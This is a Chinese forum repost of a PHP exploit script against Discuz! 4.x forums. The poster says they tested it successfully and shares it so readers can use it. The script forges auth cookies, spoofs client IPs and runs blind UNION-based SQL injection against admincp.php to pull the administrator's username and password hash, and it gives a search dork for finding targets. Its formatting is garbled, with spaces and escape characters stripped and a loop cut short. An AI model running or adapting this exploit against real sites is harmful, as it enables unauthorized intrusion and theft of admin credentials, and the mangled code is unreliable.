Discuz! 4.x SQL injection / admin credentials disclosure exploit

前段时间发过Discuz!5.0.0GBK版本的EXP
今天在CN.Tink那里看到的4.x的，我去原站转了过来，然后找了个Discuz!4.1.0测试了一下，成功，看下面截图，Discuz!5.0.0GBK版本的那个EXP又许多朋友不知道怎么用，当时我说了下，还是有朋友不明白，这次我截了图上来，不知道怎么用的朋友看下应该明白的。
图：

复制代码 代码如下:
print_r('
---------------------------------------------------------------------------
Discuz!4.xSQLinjection/admincredentialsdisclosureexploit
byrgodrgod@autistici.org
site:http://retrogod.altervista.org
dork:"poweredbydiscuz!
---------------------------------------------------------------------------
');
if($argc<3){
print_r('
---------------------------------------------------------------------------
Usage:php'.$argv[0].'hostpathOPTIONS
host:targetserver(ip/hostname)
path:pathtodiscuz
Options:
-p[port]:specifyaportotherthan80
-P[ip:port]:specifyaproxy
Example:
php'.$argv[0].'localhost/discuz/-P1.1.1.1:80
php'.$argv[0].'localhost/discuz/-p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

functionquick_dump($string)
{
$result='';$exa='';$cont=0;
for($i=0;$i<=strlen($string)-1;$i++)
{
if((ord($string[$i])<=32)|(ord($string[$i])>126))
{$result.=".";}
else
{$result.="".$string[$i];}
if(strlen(dechex(ord($string[$i])))==2)
{$exa.="".dechex(ord($string[$i]));}
else
{$exa.="0".dechex(ord($string[$i]));}
$cont++;if($cont==15){$cont=0;$result.="rn";$exa.="rn";}
}
return$exa."rn".$result;
}
$proxy_regex='(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

functionsendpacketii($packet)
{
global$proxy,$host,$port,$html,$proxy_regex;
if($proxy==''){
$ock=fsockopen(gethostbyname($host),$port);
if(!$ock){
echo'Noresponsefrom'.$host.':'.$port;die;
}
}
else{
$c=preg_match($proxy_regex,$proxy);
if(!$c){
echo'Notavalidproxy...';die;
}
$parts=explode(':',$proxy);
echo"Connectingto".$parts[0].":".$parts[1]."proxy...rn";
$ock=fsockopen($parts[0],$parts[1]);
if(!$ock){
echo'Noresponsefromproxy...';die;
}
}
fputs($ock,$packet);
if($proxy==''){
$html='';
while(!feof($ock)){
$html.=fgets($ock);
}
}
else{
$html='';
while((!feof($ock))or(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))){
$html.=fread($ock,1);
}
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for($i=3;$i<$argc;$i++){
$temp=$argv[$i][0].$argv[$i][1];
if($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if(($path[0]<>'/')or($path[strlen($path)-1]<>'/')){echo'Error...checkthepath!';die;}
if($proxy==''){$p=$path;}else{$p='http://'.$host.':'.$port.$path;}

echo"pleasewait...n";

//fromglobal.func.php
functionauthcode($string,$operation,$key=''){
$key=$key?$key:$GLOBALS['discuz_auth_key'];
$coded='';
$keylength=32;
$string=$operation=='DECODE'?base64_decode($string):$string;
for($i=0;$i$coded.=substr($string,$i,32)^$key;
}
$coded=$operation=='ENCODE'?str_replace('=','',base64_encode($coded)):$coded;
return$coded;
}

//stolenfrominstall.php
functionrandom($length){
$hash='';
$chars='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max=strlen($chars)-1;
mt_srand((double)microtime()*1000000);
for($i=0;$i<$length;$i++){
$hash.=$chars[mt_rand(0,$max)];
}
return$hash;
}

$agent="Googlebot/2.1";
//seesqlerrors...youneedauthkey,
//it'savaluemixedupwiththerandomstringincache_settigns.phpandyouruser-agent,solet'sask;)
$tt="";for($i=0;$i<=255;$i++){$tt.=chr($i);}
while(1)
{
$discuz_auth_key=random(32);
$packet="GET".$p."admincp.php?action=recyclebinHTTP/1.0rn";
$packet.="CLIENT-IP:999.999.999.999rn";//spoof
$packet.="User-Agent:$agentrn";
$packet.="Host:".$host."rn";
$packet.="Cookie:adminid=1;cdb_sid=1;cdb_auth=".authcode("suntzutsuntzut".$tt,"ENCODE").";rn";
$packet.="Accept:text/plainrn";
$packet.="Connection:Closernrn";
$packet.=$data;
sendpacketii($packet);
$html=html_entity_decode($html);
$html=str_replace("

","",$html);
$t=explode("ANDm.password='",$html);
$t2=explode("'",$t[1]);
$pwd_f=$t2[0];
$t=explode("ANDm.secques='",$html);
$t2=explode("'n",$t[1]);
$secques_f=$t2[0];
$t=explode("ANDm.uid='",$html);
$t2=explode("'x0d",$t[1]);
$uid_f=$t2[0];
$my_string=$pwd_f."t".$secques_f."t".$uid_f;
if((strlen($my_string)==270)and(!eregi("=",$my_string))){
break;
}
}
$temp=authcode("suntzutsuntzut".$tt,"ENCODE");
//calculatingkey...
$key="";
for($j=0;$j<32;$j++){
for($i=0;$i<255;$i++){
$aa="";
if($j<>0){
for($k=1;$k<=$j;$k++){
$aa.="a";
}
}
$GLOBALS['discuz_auth_key']=$aa.chr($i);
$t=authcode($temp,"DECODE");
if($t[$j]==$my_string[$j]){
$key.=chr($i);
}
}
}

//echo"AUTHKEY->".$key."rn";
$GLOBALS['discuz_auth_key']=$key;

echo"pwdhash(md5)->";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57));//numbers
$chars=array_merge($chars,range(97,102));//a-fletters
$j=1;$password="";
while(!strstr($password,chr(0)))
{
for($i=0;$i<=255;$i++)
{
if(in_array($i,$chars))
{
//youcanuseeverycharbecauseofbase64_decode()...sothisbypassmagicquotes...
//andsomehelpbyextract()tooverwritevars
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet="GET".$p."admincp.php?action=recyclebin&HTTP/1.0rn";
$packet.="User-Agent:$agentrn";
$packet.="CLIENT-IP:1.2.3.4rn";
$packet.="Host:".$host."rn";
$packet.="Cookie:adminid=1;cdb_sid=1;cdb_auth=".authcode("suntzutsuntzut".$sql,"ENCODE").";rn";
$packet.="Accept:text/plainrn";
$packet.="Connection:Closernrn";
$packet.=$data;
sendpacketii($packet);
if(eregi("action=groupexpiry",$html)){
$password.=chr($i);echochr($i);sleep(1);break;
}
}
if($i==255){
die("nExploitfailed...");
}
}
$j++;
}

echo"nadminuser->";
$j=1;$admin="";
while(!strstr($admin,chr(0)))
{
for($i=0;$i<=255;$i++)
{
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet="GET".$p."admincp.php?action=recyclebin&HTTP/1.0rn";
$packet.="User-Agent:$agentrn";
$packet.="CLIENT-IP:1.2.3.4rn";
$packet.="Host:".$host."rn";
$packet.="Cookie:adminid=1;cdb_sid=1;cdb_auth=".authcode("suntzutsuntzut".$sql,"ENCODE").";rn";
$packet.="Accept:text/plainrn";
$packet.="Connection:Closernrn";
$packet.=$data;
sendpacketii($packet);
if(eregi("action=groupexpiry",$html)){
$admin.=chr($i);echochr($i);sleep(1);break;
}
if($i==255){die("nExploitfailed...");}
}
$j++;
}

functionis_hash($hash)
{
if(ereg("^[a-f0-9]{32}",trim($hash))){returntrue;}
else{returnfalse;}
}

if(is_hash($password)){
echo"exploitsucceeded...";
}
else{
echo"exploitfailed...";
}
?>